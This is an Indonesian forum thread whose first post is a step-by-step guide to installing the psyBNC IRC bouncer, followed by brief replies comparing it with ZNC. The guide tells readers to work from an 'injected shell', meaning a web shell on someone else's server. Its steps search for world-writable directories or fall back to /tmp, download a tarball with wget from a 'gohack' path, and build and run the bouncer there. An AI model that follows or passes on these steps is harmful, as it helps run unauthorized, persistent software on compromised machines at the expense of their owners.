Install psyBNC

ArRay

IndoForum Senior C
psyBNC adalah sebuah bouncer untuk dipergunakan dalam IRC. maksud dari bouncer disini adalah seperti mirror dimana kita melakukan koneksi ke server IRC melalui bouncer tersebut. Mungkin para pengguna IRC udah pada tau apa itu IRC. Nah saya akan sedikit menjabarkan langkah2 pembuatan psyBNCnya.

okz langsung saja .

step by step
cari shell injeck di server2 yang mungkin menyediakn tempat buat scan
saya angap teman teman suda mempunyai shell injeck atau juga bisa langunsg ke shell resminya..

  1. bukan shell injeck yang anda miliki
  2. liat directory yang full write dengan cara find / -perm 777 -type d
    bila tidak di temukan directory yg full write bisa langusng ke
    dir /tmp karna dir ini full write

    sebagai tambahan kalau shell nya resmi bisa langsung donwload putty.exe untuk mulai menjalankannya proses PEMBUATANYa......ok next
  3. wget file psybnc anda di shell injeck yang anda miliki dengan cara
    wget http://channels.dal.net/gohack/psy.tar.gz
  4. kemudian extrak file psybnc anda dengan comand tar -zxvf psy.tar.gz
  5. kemudian cd .psy untuk masuk ke dalam directory psybnc
  6. exekusi file psybnc dengan cara ./config port contoh ./config 2010
  7. lanjut exekusi filenya dengan comand ./fuck
  8. skarng tinggal run psybnc anda dengan comand ./run
  9. sssssssssssssssssssssss uda de
  10. atau cara mudanya seperti ini :
    1. ./config 2010
    2. ./fuck
    3. ./run
  11. jadi daaaaaaaaaaaa ^_^
Nah kalau dah jadi semuanya.........
tinggal buka mIRC trus set IDENT kamu.... trus masukin server nya dng mengunakan server dgn nama shell yang kamu buat tadi...

miss: shell yang anda miliki tadi....
contoh :/s ark.indoforum.org port nya 2010

nah setelah itu akan muncul :

-Welcome- psyBNC2.3.1
-

--psyBNC- Your IRC Client did not support a password. Please type /QUOTE PASS yourpassword to connect.

nah mulai deh memasukan pass nya : /pass arRay

Terus tinggal addservernya :
contoh : addserver irc.indoforum.org:6667
nah setelah jadi deh.......tinggal anda menyeting yang lainnya...:)
 

PenjahaT

IndoForum Beginner A
znc kalau kita pakai di hp...kayaknya buffer banget...kalau psybnc kalau kita gak buka log gpp....kalau znc langsung ke buka log :D
 

miracle

IndoForum Beginner A
Jangan nyalain play buffer log nya di ZNC juga bisa kok.. ;))
psyBNC emang masih di-develop gan :-/
 

Pasang iklan disini dapat menyebabkan produk dikenal, omzet naik, keuntungan bertambah, good investment dan brand image. Contact us untuk memulai.
Top